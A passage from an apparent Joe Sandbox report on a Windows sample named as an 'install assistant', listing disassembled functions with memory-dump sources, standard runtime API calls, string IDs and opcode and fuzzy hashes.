                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                              • Instruction ID: 633c423e4cc2d92929f35a4d4b9ffbe83baafa5dbeed92386ee7c21585fa1762
                              • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                              • Instruction Fuzzy Hash: F6B1BC756087068BC304DF29C8806ABF7E2FFD8314F15892DE899C7711E770A59ACB96
                              Function 6C2D99F0 Relevance: .3, Instructions: 287COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                              • Instruction ID: d5876dd23ae27b1871d67ff60ba5c20d0969f9e3707e5a87bad5ecca01848f42
                              • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                              • Instruction Fuzzy Hash: 13A1E53260C3458FC315DF29C4A065ABBE1ABE9308F564A2DF8DAC7B40DA31F955CB42
                              Function 6C2D96E0 Relevance: .2, Instructions: 223COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                              • Instruction ID: 80a7487762ce4c142ce1c7aa0ced9c0b502ba6e2d45398f6c0e2edbe4ce055a4
                              • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                              • Instruction Fuzzy Hash: AD81D335A047068FD320DF29C090286B7E1FFA9704F29C96DD999DB715EB32E946CB81
                              Function 6C270B66 Relevance: .2, Instructions: 167COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                              • Instruction ID: 9893fb6acc5c702e0705632ca13453091f86b6b897b037cae1fa099c8ab03c68
                              • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                              • Instruction Fuzzy Hash: 5A51BE76E0060E9BDB08CF98D9E16ADB7F2EB88308F24806DD811E7781D7759A45CB50
                              Function 6C2CB650 Relevance: .2, Instructions: 154COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a5df0ff16b053d8fcfcdee403e066c8bbf8aa7f46747348a699df34f7397b1a9
                              • Instruction ID: 56dec9c50556a8c5be0fc1b034387ea1db7a5a5f5b81a59ca2d56e09f18aa68c
                              • Opcode Fuzzy Hash: a5df0ff16b053d8fcfcdee403e066c8bbf8aa7f46747348a699df34f7397b1a9
                              • Instruction Fuzzy Hash: DF516931B0834A8BD750DE1EC880616B7E1FF98309F244B6DED9487611D772E91ACB92
                              Function 6C272EC9 Relevance: .1, Instructions: 136COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                              • Instruction ID: c9d562d46cf792b48a1ee3575fff857f6ae33afb0d9debd654b7b171461e116e
                              • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                              • Instruction Fuzzy Hash: CA3114677A440643C71CCD3BCC5679F91539BD422A70ECF39AC09DEF55D52CD8124155
                              Function 6C2F9700 Relevance: .1, Instructions: 70COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                              • Instruction ID: b0156e192ec3ad30e380865589237473f32a7c54e98063365ec8be58085cda81
                              • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                              • Instruction Fuzzy Hash: C5219077320A0647E74C8A38D83737532D0A705318F98A22DEA6BCE2C2D73AC457C385
                              Function 6C239D35 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                              • Instruction ID: 92bf2d676819de153388b8d56d239ceb686a93c62d8eba503a2a697f5bb5f1f9
                              • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                              • Instruction Fuzzy Hash: 60E08CB2A1223CEBCB16FB88C941D8AB3ECEB46A05B110096B905D3610D670DE00C7D0
                              Function 6C2F7720 Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                              • Instruction ID: 1ed8f053a6ba501aa0f59003be1b5e31e57f133f2bee094d679d84c992e64f26
                              • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                              • Instruction Fuzzy Hash: 18C08CA312C10017C302EA2598C0BAAF6A37360330F228C3EA0A2E7E43C328C0658111
                              Function 6C28EB50 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 341COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                              • API String ID: 3519838083-609671
                              • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                              • Instruction ID: fe5ce3d5953f3dfa5b1e329e2efa429e7c6d40b305615ef677ad17173a865b14
                              • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                              • Instruction Fuzzy Hash: 28D1B175A0620EDFCB11CFA4D980EEEB7B5FF15318F244119E855A3A90DB70A94DCBA0
                              Function 6C276798 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 461COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv$H_prolog
                              • String ID: >WJ$x$x
                              • API String ID: 2300968129-3162267903
                              • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                              • Instruction ID: 71b65b744fd9e0950c81e27e81b30348642e3977475504f375eba1766a8de0d0
                              • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                              • Instruction Fuzzy Hash: 2912597190020EDFDF20DFA5C8C4ADDBBB5FF49318F248169E819A7650DB359949CB60
                              Function 6C229AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                              Download Yara Rule
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 6C229B07
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6C229B0F
                              • _ValidateLocalCookies.LIBCMT ref: 6C229B98
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6C229BC3
                              • _ValidateLocalCookies.LIBCMT ref: 6C229C18
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: 85d2834944de06f596b836cbc9f12da1895f8a13c920000ea48ae3292ebdcf4a
                              • Instruction ID: 8bea3654dd633a09d0fe860d1ce6f202ced91d8199e2736266cc06c51e29c32d
                              • Opcode Fuzzy Hash: 85d2834944de06f596b836cbc9f12da1895f8a13c920000ea48ae3292ebdcf4a
                              • Instruction Fuzzy Hash: 9341A270A1021D9FCF00EF68C884ADEBFB5AF45318F248195EC199BB51D73ADA15CB90
                              Function 6C236E9A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: api-ms-$ext-ms-
                              • API String ID: 0-537541572
                              • Opcode ID: 30ce951fa38ead23bbf3eeef391fa11be285fa71039f916efd6ec02da3701412
                              • Instruction ID: c94e6c800c493279153aeefa810a1b43632a8ddf2456ec39959c40090cb70e0d
                              • Opcode Fuzzy Hash: 30ce951fa38ead23bbf3eeef391fa11be285fa71039f916efd6ec02da3701412
                              • Instruction Fuzzy Hash: 8B21C8B1A2563AA7DB1287298CC4A0B776CBF42765B152250FD1AE79C0D730D91085E0
                              Function 6C23BEB1 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetConsoleCP.KERNEL32(?,6C23B0D0,?), ref: 6C23BEF9
                              • __fassign.LIBCMT ref: 6C23C0D8
                              • __fassign.LIBCMT ref: 6C23C0F5
                              • WriteFile.KERNEL32(?,6C245AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C23C13D
                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C23C17D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C23C229
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileWrite__fassign$ConsoleErrorLast
                              • String ID:
                              • API String ID: 4031098158-0
                              • Opcode ID: 2b88f3c32914761f939cc1b3dd8b2ea0bb32c99c5eda8f82b999b00bb4c4ed85
                              • Instruction ID: a03a0e8dcd68ec03e9fc71dff5f20daba683e5655aca5717d09a7743e2c02bee
                              • Opcode Fuzzy Hash: 2b88f3c32914761f939cc1b3dd8b2ea0bb32c99c5eda8f82b999b00bb4c4ed85
                              • Instruction Fuzzy Hash: 17D19AB1E0126C9FCF05DFE8C8809EDBBB5BF49314F24125AE859BB241D731AA06CB50
                              Function 6C0F2F60 Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                              Download Yara Rule
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C0F2F95
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C0F2FAF
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0F2FD0
                              • __Getctype.LIBCPMT ref: 6C0F3084
                              • std::_Facet_Register.LIBCPMT ref: 6C0F309C
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0F30B7
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                              • String ID:
                              • API String ID: 1102183713-0
                              • Opcode ID: 6f8dbcb2d05b48348cc15070a143b7dc5738fa0ace5c45350dfa63f63461f8c1
                              • Instruction ID: 8d92d21f855640691affb79c3f211f949cfff0d27323e757c51399a7a2797a14
                              • Opcode Fuzzy Hash: 6f8dbcb2d05b48348cc15070a143b7dc5738fa0ace5c45350dfa63f63461f8c1
                              • Instruction Fuzzy Hash: D64157B2E006588FCF14CF88D855B9EB7F4FB48724F054129D869ABB40D739A949CF91
                              Function 6C264FA6 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv$__aullrem
                              • String ID:
                              • API String ID: 2022606265-0
                              • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction ID: 28edb4534c1e23d71230e00dffa2c73b7f1d52e2fe93fa06f08d296da5bba89f
                              • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction Fuzzy Hash: 8721933054121EFBDF218F968C40DDFBA6DEF457A9F308235BD2461A90DA718D91C6B1
                              Function 6C26A6EC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 183COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C26A6F1
                                • Part of subcall function 6C279173: __EH_prolog.LIBCMT ref: 6C279178
                              • __EH_prolog.LIBCMT ref: 6C26A8F9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: IJ$WIJ$J
                              • API String ID: 3519838083-740443243
                              • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction ID: 06165a166edc3f2c483b6db1f482676570fcd46dedcfd4695c69a77611a8add1
                              • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction Fuzzy Hash: 6A719030900259DFDB15DF65C485BEEB7B0FF14308F1084A9EC56ABB91CB74AA49CBA1
                              Function 6C245A0D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 6C245ADD
                              • _free.LIBCMT ref: 6C245B06
                              • SetEndOfFile.KERNEL32(00000000,6C2446EC,00000000,6C23B0D0,?,?,?,?,?,?,?,6C2446EC,6C23B0D0,00000000), ref: 6C245B38
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C2446EC,6C23B0D0,00000000,?,?,?,?,00000000,?), ref: 6C245B54
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free$ErrorFileLast
                              • String ID: 8Q
                              • API String ID: 1547350101-4022487301
                              • Opcode ID: f9e600f32e1e0ec06a6632a182083b375d45f2cd93fb6cb3636a76ff06c74b10
                              • Instruction ID: 117331fab1e6b51ab831ded63880d6dda0bc89640733480930d6c156a8d9da44
                              • Opcode Fuzzy Hash: f9e600f32e1e0ec06a6632a182083b375d45f2cd93fb6cb3636a76ff06c74b10
                              • Instruction Fuzzy Hash: 9341FB7250061EABDB099BB8CC81BCE3BB5EF49328F244521FC94E7B90DB34C8458760
                              Function 6C27E418 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C27E41D
                                • Part of subcall function 6C27EE40: __EH_prolog.LIBCMT ref: 6C27EE45
                                • Part of subcall function 6C27E8EB: __EH_prolog.LIBCMT ref: 6C27E8F0
                                • Part of subcall function 6C27E593: __EH_prolog.LIBCMT ref: 6C27E598
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: &qB$0aJ$A0$XqB
                              • API String ID: 3519838083-1326096578
                              • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction ID: e28c65e6b1fc2e2b04a52157780c998537557b362944eb4b358757c6cc5c6b48
                              • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction Fuzzy Hash: C8218871D0124CEECB08DBE4D9959EEBBB4AF25318F60412AE81667780DB780E1CCB61
                              Function 6C27E234 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J$DJ$`J
                              • API String ID: 3519838083-2453737217
                              • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                              • Instruction ID: 9da9b4390913fc41c8757cda6b78ea5968b505c3df5515d556040b6edad02a07
                              • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                              • Instruction Fuzzy Hash: 5211C5B0500B68CEC720DF5AC49459AFBE4FFA5708B10C91FC4A687B50C7F8A549CB95
                              Function 6C22F12A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C22F1B4,?,?,6C22F235,?,?,?), ref: 6C22F13F
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C22F152
                              • FreeLibrary.KERNEL32(00000000,?,?,6C22F1B4,?,?,6C22F235,?,?,?), ref: 6C22F175
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
